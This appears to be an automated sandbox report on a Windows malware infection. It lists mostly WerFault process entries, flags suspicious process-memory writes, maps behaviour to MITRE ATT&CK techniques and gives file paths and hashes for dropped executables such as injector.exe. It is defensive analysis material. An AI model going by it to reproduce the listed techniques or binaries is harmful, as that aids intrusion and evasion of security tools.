C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1536 -ip 1536
1⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1536 -ip 1536
1⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1536 -ip 1536
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1536 -ip 1536
1⤵
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1536 -ip 1536
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1536 -ip 1536
1⤵
PID:616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1536 -ip 1536
1⤵
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1536 -ip 1536
1⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1536 -ip 1536
1⤵
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1536 -ip 1536
1⤵
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1536 -ip 1536
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1536 -ip 1536
1⤵
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1536 -ip 1536
1⤵
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1536 -ip 1536
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1536 -ip 1536
1⤵
PID:3316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3976 -ip 3976
1⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3976 -ip 3976
1⤵
PID:2604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3976 -ip 3976
1⤵
PID:3584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3976 -ip 3976
1⤵
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3976 -ip 3976
1⤵
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3976 -ip 3976
1⤵
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3976 -ip 3976
1⤵
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3976 -ip 3976
1⤵
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3976 -ip 3976
1⤵
PID:780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3976 -ip 3976
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3976 -ip 3976
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3976 -ip 3976
1⤵
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 3976 -ip 3976
1⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3976 -ip 3976
1⤵
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3976 -ip 3976
1⤵
PID:4068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3976 -ip 3976
1⤵
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4820 -ip 4820
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4820 -ip 4820
1⤵
PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4820 -ip 4820
1⤵
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4820 -ip 4820
1⤵
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4820 -ip 4820
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4820 -ip 4820
1⤵
PID:2072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4820 -ip 4820
1⤵
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4820 -ip 4820
1⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4820 -ip 4820
1⤵
PID:1276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4820 -ip 4820
1⤵
PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4820 -ip 4820
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4820 -ip 4820
1⤵
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4820 -ip 4820
1⤵
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4820 -ip 4820
1⤵
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4820 -ip 4820
1⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4820 -ip 4820
1⤵
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 748 -ip 748
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4820 -ip 4820
1⤵
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4820 -ip 4820
1⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4820 -ip 4820
1⤵
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4820 -ip 4820
1⤵
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4820 -ip 4820
1⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4820 -ip 4820
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4820 -ip 4820
1⤵
PID:964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4820 -ip 4820
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1832 -ip 1832
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3496 -ip 3496
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4180 -ip 4180
1⤵
PID:5408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260
1⤵
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1456 -ip 1456
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5008 -ip 5008
1⤵
PID:5620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1472 -ip 1472
1⤵
PID:5868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3496 -ip 3496
1⤵
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4180 -ip 4180
1⤵
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 2260 -ip 2260
1⤵
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5008 -ip 5008
1⤵
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1456 -ip 1456
1⤵
PID:6092

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
2⤵
PID:5616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3496 -ip 3496
1⤵
PID:6068

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
2⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 4408 -ip 4408
1⤵
PID:6268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 3496 -ip 3496
1⤵
PID:6472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4820 -ip 4820
1⤵
PID:6820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6384 -ip 6384
1⤵
PID:6948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4820 -ip 4820
1⤵
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3496 -ip 3496
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6384 -ip 6384
1⤵
PID:5116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
6d846337de6ac7fb1fe4e7eedca07f65

SHA1
e26d93d6e07aad59fc2f76bcb42a0890e9949499

SHA256
1c1e85acacdba79a1c5bb594adbd45ab378b923f922fc9ec51c6006cfd1edd2d

SHA512
79d8523287c7c81a08fb9e66ecb7146c5bd920d80b92556350a36855ceb04ceb6279bbea2a44ac869af3fea9b5c6e7e98ac6fcef53b99e8b92a0079465b24ebb

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
56d677067ab2c679322f39399564f89f

SHA1
b5c6dcb1774c6d4bd88fa9629a1cd589a6fa7b88

SHA256
d3e99387280c4d495ea9115c5c6e7b92289763d8b79578caf6ab06f4fe16fdf8

SHA512
b48ba8c27706dcb1e22197c85395a36ab74d354b428d8dcbccf7fb934167588ecfa4aaa0c6ee2c658609bf78fcb8c477f8dfcd7129370065cb920930ba9191c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
56d677067ab2c679322f39399564f89f

SHA1
b5c6dcb1774c6d4bd88fa9629a1cd589a6fa7b88

SHA256
d3e99387280c4d495ea9115c5c6e7b92289763d8b79578caf6ab06f4fe16fdf8

SHA512
b48ba8c27706dcb1e22197c85395a36ab74d354b428d8dcbccf7fb934167588ecfa4aaa0c6ee2c658609bf78fcb8c477f8dfcd7129370065cb920930ba9191c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
907b8a8bacc5432518151b830339539d

SHA1
9d5a934d1291db04f88482e2c3e5f3053552e044

SHA256
61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

SHA512
8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
0f00fcb9597bd612c21eecc288a179bc

SHA1
409ab50115440a5c725c1e753f1e0eb5d6a50a04

SHA256
b5cb460a9d30794df04a6e93dbe452e463cbe0392f37bb888dab42b4d254ba09

SHA512
227d3170a1376c4366840308a30422ebc6d3169c3bfa0844e122854cacb868abedc0aeb45e982262132146a6c3546d1b5363577f9c945492befa489bdcc7e145

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
0f00fcb9597bd612c21eecc288a179bc

SHA1
409ab50115440a5c725c1e753f1e0eb5d6a50a04

SHA256
b5cb460a9d30794df04a6e93dbe452e463cbe0392f37bb888dab42b4d254ba09

SHA512
227d3170a1376c4366840308a30422ebc6d3169c3bfa0844e122854cacb868abedc0aeb45e982262132146a6c3546d1b5363577f9c945492befa489bdcc7e145

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
04221f9f97a19260a74ffb295ac79da7

SHA1
9c9fa232beca9199aa4afe61c15148496395da8c

SHA256
38dc784aebfa8036ab0564291c4359b3c34900c3f714c1fe068d7c562e778dc4

SHA512
589d6107ea2f3e5cb274d97a06fd81675a5a1a2a999460ab74159228f9f78ef8058015f20295f6fcc9184b5eebbfb774a5cef5aea52b2451b58f61a77aef70b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
04221f9f97a19260a74ffb295ac79da7

SHA1
9c9fa232beca9199aa4afe61c15148496395da8c

SHA256
38dc784aebfa8036ab0564291c4359b3c34900c3f714c1fe068d7c562e778dc4

SHA512
589d6107ea2f3e5cb274d97a06fd81675a5a1a2a999460ab74159228f9f78ef8058015f20295f6fcc9184b5eebbfb774a5cef5aea52b2451b58f61a77aef70b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
59cf9819a4ce2a65b594f2afd3ce785a

SHA1
fc34a4b05c288b7fbe1f8f398b08908f3e6c656d

SHA256
999a8a10d72997717568184f4b2a4e037218f123149d23f444af6aa4ce73592c

SHA512
5f89677e08356c5ab88f02f1b4b9238eb0debca37f7496363e7b646d7a402ca61ae51d2d94ebc7d0840472782a09b6bea109e82285def1ef0c9e3ed638d8928c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
59cf9819a4ce2a65b594f2afd3ce785a

SHA1
fc34a4b05c288b7fbe1f8f398b08908f3e6c656d

SHA256
999a8a10d72997717568184f4b2a4e037218f123149d23f444af6aa4ce73592c

SHA512
5f89677e08356c5ab88f02f1b4b9238eb0debca37f7496363e7b646d7a402ca61ae51d2d94ebc7d0840472782a09b6bea109e82285def1ef0c9e3ed638d8928c

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
99b0bfa11652fbbcfb8f57520e8a2b7b

SHA1
911006936374fcf079d3dcaea1172ea1d485e459

SHA256
b2991e2922a8cf293e275b791a002cc6f74a8acdd5f5e16b3174e93003b258d4

SHA512
8f68278a280f6485724a02713ceb2afba189196d24403701f07650a618eee7386410c2ef3c0df5c70a78b36b09938218cf45e0a2023aab0843e686cbaab98772

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
ef5fa39e09a0febbc977b43a4bfda43a

SHA1
83ad5c3c8e7602b6bda1d7ee855cfcc2bbfc086f

SHA256
a849d4de3bcd2ef6b4cb496dd99a0481583a394333d84458d80ce10b28b8a4e1

SHA512
e4191553c11b40365daa0da69f89acaee01e037273c5668c8b3d8f163b9fdb5008fb65b8673b582301d61ef72fcb1aa3ca01efcde556243f5d68a61865901ca9

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
ef5fa39e09a0febbc977b43a4bfda43a

SHA1
83ad5c3c8e7602b6bda1d7ee855cfcc2bbfc086f

SHA256
a849d4de3bcd2ef6b4cb496dd99a0481583a394333d84458d80ce10b28b8a4e1

SHA512
e4191553c11b40365daa0da69f89acaee01e037273c5668c8b3d8f163b9fdb5008fb65b8673b582301d61ef72fcb1aa3ca01efcde556243f5d68a61865901ca9

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
e4dcf3582400e3b62c80249c4643000d

SHA1
718effa9f25c4d3d0ea160076910282fc3baf1d5

SHA256
9b83a75c99fa88f4e29e012fffd1fc6ffe1268f8f948f2b08906f6a6c0e56b3a

SHA512
009102b9e9e511c0f0be44e82df43cbc3afbcb3c0c1deed33f922c32e4054d276f8b164d313eb846eb9fbf4c6a41cce5b2893589b6eb41115d091325c49ddfc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
e4dcf3582400e3b62c80249c4643000d

SHA1
718effa9f25c4d3d0ea160076910282fc3baf1d5

SHA256
9b83a75c99fa88f4e29e012fffd1fc6ffe1268f8f948f2b08906f6a6c0e56b3a

SHA512
009102b9e9e511c0f0be44e82df43cbc3afbcb3c0c1deed33f922c32e4054d276f8b164d313eb846eb9fbf4c6a41cce5b2893589b6eb41115d091325c49ddfc1

Download Submit
C:\Users\Admin\Pictures\Adobe Films\FCLlb7XZEV2HcE0uHejczRnm.exe
MD5
266a1335f73ff12584a5d1d2e65b8be7

SHA1
35a6d1593a0ff74f209de0f294cd7b7cd067c14c

SHA256
316a7cea264e8cc29efe6dc3def98eeff7c42138ceba126127dc8228a119cfee

SHA512
35bdc71211656abaf05cde978594b5d0ad11d154851d90adc80fb96e1c737682561e82615024453bf6f483cb7bf451bd604993343e3bfb2d369deef25d1e4361

Download Submit
C:\Users\Admin\Pictures\Adobe Films\FCLlb7XZEV2HcE0uHejczRnm.exe
MD5
266a1335f73ff12584a5d1d2e65b8be7

SHA1
35a6d1593a0ff74f209de0f294cd7b7cd067c14c

SHA256
316a7cea264e8cc29efe6dc3def98eeff7c42138ceba126127dc8228a119cfee

SHA512
35bdc71211656abaf05cde978594b5d0ad11d154851d90adc80fb96e1c737682561e82615024453bf6f483cb7bf451bd604993343e3bfb2d369deef25d1e4361

Download Submit
C:\Users\Admin\Pictures\Adobe Films\FUHfCYkZkHsvnaBOFezci_VP.exe
MD5
c4729b22af5fddb503601f0819709e32

SHA1
0d27d046eb78c188c1eccfd1d0654a8262d97aab

SHA256
fb2b6caaeb56477df79dc728f7e4f5547f2c29d9bbf1d4c230da23c5603f22b4

SHA512
83d434b1e6265097462807536811dae19f9fb7c3760bff11e6da7715208846f4d06c5aec6434ff9159be7e8ec8b0bebac8de9d58a490fe13312ab1f81aaef4c0

Download Submit
C:\Users\Admin\Pictures\Adobe Films\FUHfCYkZkHsvnaBOFezci_VP.exe
MD5
c4729b22af5fddb503601f0819709e32

SHA1
0d27d046eb78c188c1eccfd1d0654a8262d97aab

SHA256
fb2b6caaeb56477df79dc728f7e4f5547f2c29d9bbf1d4c230da23c5603f22b4

SHA512
83d434b1e6265097462807536811dae19f9fb7c3760bff11e6da7715208846f4d06c5aec6434ff9159be7e8ec8b0bebac8de9d58a490fe13312ab1f81aaef4c0

Download Submit
C:\Users\Admin\Pictures\Adobe Films\GwO_2OM7gbGEaJk9mFQFWpc1.exe
MD5
369dd7428bceb3b76685d055db2a499c

SHA1
d134973ea4629b3863a42d8beeb8e067dfdc6dca

SHA256
1c45b31aa06bca3744c990dcbff5a3b676f190b9617de9a1fa159816171e9a55

SHA512
99fa8754884d12ed588c492e5ad8315851591db9ee911417a67a78ec60a92f5d01e72ee40ade69e217d7c92761d453366eec295899d88e29383bd6516394d956

Download Submit
